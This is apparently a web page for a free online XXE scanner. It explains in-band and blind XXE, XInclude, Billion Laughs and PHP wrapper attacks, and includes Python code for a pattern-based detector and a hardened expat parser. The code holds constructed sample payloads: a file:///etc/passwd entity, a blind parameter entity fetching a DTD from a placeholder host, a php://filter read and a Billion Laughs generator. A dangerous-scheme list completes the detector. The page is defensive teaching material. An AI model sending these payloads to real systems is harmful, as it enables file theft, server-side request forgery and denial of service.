Multi-Protocol Detection
Identifies dangerous URI schemes including file://, http://, php://, gopher://, netdoc://, and expect:// commonly used in XXE exploitation chains.
Instantly detect XML External Entity (XXE) injection vulnerabilities, SSRF vectors, entity bombs, blind XXE patterns, and dangerous protocol handlers in your XML — free, with no login required.
Supports .xml, .dtd, .xsd, .svg, .rss — max 500KB
Advanced Detection
Our scanner combines pattern analysis, structural inspection, and parser-level checks to surface XXE risks instantly.
Detects parameter entities and out-of-band patterns used in blind XXE attacks where data exfiltration occurs via DNS or HTTP callbacks.
Identifies Billion Laughs and other recursive entity expansion patterns that can exhaust server memory and cause denial-of-service.
Flags xi:include namespace declarations — an often-overlooked XXE alternative that bypasses DOCTYPE-level defences entirely.
Surfaces XML-based Server-Side Request Forgery vectors targeting internal cloud metadata endpoints, Redis, Memcached, and SMTP services.
Nine ready-to-test payloads covering file read, SSRF, PHP wrappers, RCE via expect, gopher SSRF, and one safe reference XML.
Runs a libxml2-powered parse check to surface malformed XML errors alongside security findings — a complete picture in one scan.
Download the full scan report as structured JSON for integration with SIEM platforms, bug trackers, or CI/CD pipelines.
Every finding maps to OWASP Top 10 categories and CWE identifiers, making remediation reporting clear for developers and auditors.
How It Works
No account, no setup, no waiting. Paste and scan in seconds.
Paste raw XML, upload a file (.xml, .dtd, .svg, .wsdl), or select a sample payload from the built-in library.
Select Standard, Deep, or OWASP-aligned mode depending on the thoroughness and focus you need.
Findings are grouped by severity with line numbers, matched patterns, CWE references, and actionable remediation guidance.
Download the JSON report, filter by severity, and apply the parser-specific remediation steps provided for your stack.
XML External Entity (XXE) injection ranks among the most impactful and frequently underestimated attack classes in modern web applications. Every time a backend system ingests XML, it relies on a parser to interpret the document's structure — and if that parser is configured to honour entity declarations, an attacker can weaponise the standard to read arbitrary files, forge internal HTTP requests, or crash the server entirely.
The mechanics of an XXE attack are deceptively simple. An attacker embeds a DOCTYPE block containing a custom entity that points to a sensitive resource — most classically file:///etc/passwd on Linux systems or file:///C:/Windows/win.ini on Windows. When the application echoes the parsed value back to the client, the file's contents travel with it. This is in-band XXE, and it remains one of the fastest paths from unauthenticated access to credential theft in enterprise environments.
Blind XXE variants are more sophisticated. Here, the parser resolves an external entity that triggers an HTTP or DNS callback to an attacker-controlled server, exfiltrating data without any response reflection. Parameter entities — prefixed with the % symbol inside DOCTYPE — are a hallmark of blind XXE chains. They allow the construction of multi-stage payloads that first load a remote DTD, which in turn defines secondary entities referencing local files, forwarding their contents over the network.
XML injection through XInclude represents another blind spot. Because XInclude is processed at the application layer rather than the DTD level, parsers that reject DOCTYPE declarations may still resolve xi:include elements, making XInclude a common bypass for naive XXE mitigations. Our scanner explicitly checks for the XInclude namespace alongside traditional entity vectors.
The denial-of-service dimension of XML XXE is often overlooked. The Billion Laughs attack — a chain of self-referential entity definitions — can inflate a 1 KB document into gigabytes of in-memory text, collapsing the parser in milliseconds. With no network access required, this makes it a particularly accessible tool for disrupting publicly exposed XML endpoints such as SOAP APIs, RSS feeds, and XML configuration services.
XXE via PHP wrappers adds further depth. When the php://filter stream wrapper appears in a SYSTEM entity URI, attackers can retrieve base64-encoded file contents — bypassing controls that look for plaintext patterns. The even more severe expect:// wrapper, if the PHP expect extension is installed, turns an XXE finding directly into remote code execution.
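The five attack patterns described above (SYSTEM entities pointing at file:// or php:// URIs, parameter entities for blind XXE, the XInclude namespace, and Billion Laughs expansion) can all be recognised statically before a document ever reaches a parser. The following is an added example of such a pattern-based pre-check, written for this page; it is not the scanner's own code. The sample payloads, the `oob.example.invalid` host and the placeholder paths are constructed for the demonstration, and the expansion estimate is computed by walking internal entity values recursively rather than by expanding them.

```python
"""Pattern-based XXE pre-check over constructed sample payloads (added example, not the
page's scanner). Flags external entity URIs by scheme, parameter entities, the XInclude
namespace, and recursive entity expansion (Billion Laughs) without expanding anything."""
import re
from dataclasses import dataclass

# URI schemes the page lists as dangerous inside a SYSTEM/PUBLIC entity URI.
DANGEROUS_SCHEMES = {"file", "http", "https", "ftp", "php", "gopher", "netdoc", "expect", "jar"}
PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}
EXPANSION_LIMIT = 1 << 20          # flag anything that would expand past 1 MiB
UNBOUNDED = 10 ** 12               # stand-in size for an entity reference cycle


@dataclass
class Finding:
    severity: str   # CRITICAL, HIGH or MEDIUM
    rule: str
    detail: str


# <!ENTITY name SYSTEM "uri">, <!ENTITY name PUBLIC "id" "uri">, <!ENTITY name "value">,
# and the parameter-entity form <!ENTITY % name ...>
ENTITY_DECL = re.compile(
    r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[\w.:-]+)\s+"
    r"(?:(?:SYSTEM|PUBLIC\s+[\"'][^\"']*[\"'])\s+[\"'](?P<uri>[^\"']*)[\"']"
    r"|[\"'](?P<value>[^\"']*)[\"'])",
    re.IGNORECASE,
)
ENTITY_REF = re.compile(r"&([\w.:-]+);")
DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
XINCLUDE_NS = re.compile(r"xmlns(?::[\w-]+)?\s*=\s*[\"']http://www\.w3\.org/2001/XInclude[\"']")


def expansion_size(xml_text: str) -> int:
    """Estimate how many characters the entity references in the document body expand to.
    Internal entity values are walked recursively; a reference cycle counts as unbounded."""
    internal = {m["name"]: m["value"] for m in ENTITY_DECL.finditer(xml_text)
                if not m["param"] and m["value"] is not None}
    memo: dict = {}

    def size(name: str, stack: frozenset) -> int:
        if name in PREDEFINED:
            return 1
        if name not in internal:          # external or undeclared: reported by other rules
            return 0
        if name in stack:
            return UNBOUNDED
        if name not in memo:
            value = internal[name]
            total = len(ENTITY_REF.sub("", value))
            for ref in ENTITY_REF.findall(value):
                total = min(UNBOUNDED, total + size(ref, stack | {name}))
            memo[name] = total
        return memo[name]

    body = ENTITY_DECL.sub("", xml_text)  # count only references outside the declarations
    return min(UNBOUNDED, sum(size(r, frozenset()) for r in ENTITY_REF.findall(body)))


def scan(xml_text: str) -> list:
    """Return the findings for one document."""
    findings = []
    if DOCTYPE.search(xml_text):
        findings.append(Finding("MEDIUM", "doctype-present",
                                "DOCTYPE found; disable DTD processing unless it is required"))
    for m in ENTITY_DECL.finditer(xml_text):
        if m["param"]:
            findings.append(Finding("HIGH", "parameter-entity",
                                    f"%{m['name']}; is a building block of blind/out-of-band XXE"))
        if m["uri"] is not None:
            scheme = m["uri"].split(":", 1)[0].lower() if ":" in m["uri"] else "relative"
            sev = "CRITICAL" if scheme in DANGEROUS_SCHEMES else "HIGH"
            findings.append(Finding(sev, "external-entity", f"{m['name']} resolves {scheme}: {m['uri']}"))
    if XINCLUDE_NS.search(xml_text):
        findings.append(Finding("HIGH", "xinclude",
                                "XInclude namespace declared; xi:include works without a DOCTYPE"))
    size = expansion_size(xml_text)
    if size > EXPANSION_LIMIT:
        findings.append(Finding("CRITICAL", "entity-expansion",
                                f"entities expand to about {size:,} characters (Billion Laughs)"))
    return findings


def rule_names(xml_text: str) -> set:
    return {f.rule for f in scan(xml_text)}


def _billion_laughs(depth: int = 9, fanout: int = 10) -> str:
    """Constructed nested-entity document: depth 9, fanout 10 expands to 3 * 10**9 characters."""
    decls, prev = ['<!ENTITY lol "lol">'], "lol"
    for i in range(1, depth + 1):
        decls.append(f'<!ENTITY lol{i} "{f"&{prev};" * fanout}">')
        prev = f"lol{i}"
    return f'<?xml version="1.0"?><!DOCTYPE lolz [{"".join(decls)}]><lolz>&{prev};</lolz>'


# Constructed samples; the host and the paths are placeholders, not real targets.
SAMPLES = {
    "file-read": '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                 '<foo>&xxe;</foo>',
    "blind-param": '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % dtd SYSTEM '
                   '"http://oob.example.invalid/x.dtd"> %dtd;]><foo/>',
    "php-filter": '<!DOCTYPE foo [<!ENTITY xxe SYSTEM '
                  '"php://filter/convert.base64-encode/resource=config.php">]><foo>&xxe;</foo>',
    "xinclude": '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
                '<xi:include parse="text" href="file:///placeholder/path"/></foo>',
    "billion-laughs": _billion_laughs(),
    "safe": '<?xml version="1.0"?><order><id>1</id><sku>ABC-123</sku></order>',
}

if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        print(f"== {label}")
        for f in scan(doc):
            print(f"  [{f.severity}] {f.rule}: {f.detail}")
```

Counting the expansion instead of performing it is the point of the Billion Laughs rule: the nine-level sample is a few hundred bytes on disk but the estimate comes back as three billion characters, which is exactly the amplification a parser would have to materialise. A pre-check like this complements, rather than replaces, hardening the parser itself.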
From an XXE test and remediation standpoint, the most reliable defence is disabling external entity processing at the parser level. In PHP, calling libxml_disable_entity_loader(true) before any simplexml_load_string() or DOMDocument::loadXML() call prevents the parser from resolving SYSTEM or PUBLIC entities. In Java, setting XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES to false and enabling the http://apache.org/xml/features/disallow-doctype-decl feature on SAX and DOM factories achieves the same result. Python's defusedxml library wraps stdlib parsers with sane defaults. Whichever language stack you use, never pass untrusted XML to a parser that has not been explicitly hardened.
Security vulnerability management in XML-heavy architectures also benefits from a schema-first approach. Pre-validating incoming documents against a fixed, server-side XSD schema ensures the structure matches expectations before any entity expansion can occur. Pairing schema validation with a strict URI allowlist — permitting only approved protocol schemes and hostnames — eliminates the remaining attack surface even when entity processing is inadvertently left enabled.
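To make the parser-level defence concrete, here is an added example (written for this page, not taken from the scanner or from defusedxml) that applies the same hardening to Python's standard-library expat binding: any DOCTYPE is refused outright, which also stops Billion Laughs before a single entity is expanded, parameter entity parsing is switched off so no external DTD is ever fetched, external entity references are refused, the XInclude namespace is rejected, and a size cap is applied up front. The inputs are constructed; the file path in the XInclude sample is a placeholder. One caveat on the PHP advice above: libxml_disable_entity_loader() is deprecated as of PHP 8.0 because the libxml2 versions PHP 8 requires no longer load external entities unless LIBXML_NOENT is passed, so not passing LIBXML_NOENT is the part of that guidance that still carries weight.

```python
"""Hardened XML parsing with the standard library's expat binding (added example, not the
page's code). Enforces what defusedxml-style hardening enforces: no DTD, no external
entity fetches, no parameter entities, and XInclude refused as well."""
import xml.parsers.expat as expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"
MAX_BYTES = 500 * 1024   # same cap as the upload limit quoted on the page


class UnsafeXML(ValueError):
    """The document uses a construct the hardened parser refuses."""


def parse_hardened(data: bytes, max_bytes: int = MAX_BYTES) -> dict:
    """Parse untrusted XML into a simple tree: {"tag", "attrs", "text", "children"}.

    Raises UnsafeXML for any DOCTYPE, any external entity reference, or an XInclude
    namespace declaration; malformed XML raises expat.ExpatError as usual."""
    if len(data) > max_bytes:
        raise UnsafeXML(f"document is {len(data)} bytes; limit is {max_bytes}")

    parser = expat.ParserCreate(namespace_separator=" ")
    parser.buffer_text = True
    # Never process parameter entities, so no external DTD is ever fetched.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Rejecting the DOCTYPE removes entity declarations, and with them XXE and
        # Billion Laughs, before any expansion can happen.
        raise UnsafeXML(f"DOCTYPE {name!r} rejected: DTD processing is disabled")

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity {sysid!r} rejected")

    def on_namespace(prefix, uri):
        if uri == XINCLUDE_NS:
            raise UnsafeXML("XInclude namespace rejected")

    def on_start(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def on_end(tag):
        stack.pop()

    def on_text(text):
        stack[-1]["text"] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartNamespaceDeclHandler = on_namespace
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return root["children"][0]


def is_rejected(data: bytes) -> bool:
    """True when the hardened parser refuses the document for security reasons."""
    try:
        parse_hardened(data)
    except UnsafeXML:
        return True
    return False


# Constructed inputs for the demonstration.
BENIGN = b'<?xml version="1.0"?><order><id>1</id><sku>ABC-123</sku></order>'
FILE_ENTITY = b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
XINCLUDE = (b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            b'<xi:include parse="text" href="file:///placeholder/path"/></foo>')

if __name__ == "__main__":
    print(parse_hardened(BENIGN)["tag"])                     # order
    for label, doc in (("file entity", FILE_ENTITY), ("xinclude", XINCLUDE)):
        print(label, "rejected" if is_rejected(doc) else "accepted")
```

Refusing the DOCTYPE wholesale is deliberately blunt: the page's schema-first approach still applies on top of it, since a document with no DTD can still have the wrong shape, and the XSD used for that validation must come from the server, never from a URI inside the document.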
Use this free XXE vulnerability scanner as the first line of defence in your XML security review. Load a payload, observe the detection logic, and then apply the remediation steps to your own parser configuration. Prevention is always cheaper than breach response.
FAQ
libxml_disable_entity_loader(true) and avoid LIBXML_NOENT. In Java: set XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES = false and enable the disallow-doctype-decl feature. In Python: use the defusedxml library. Additionally, validate XML against a fixed server-side schema, never load schemas from untrusted URIs, and prefer JSON where XML is not strictly required.
SEOWebChecker.com offers 100+ free online tools covering security testing, SEO analysis, converters, DevOps utilities, and AI-powered workflows.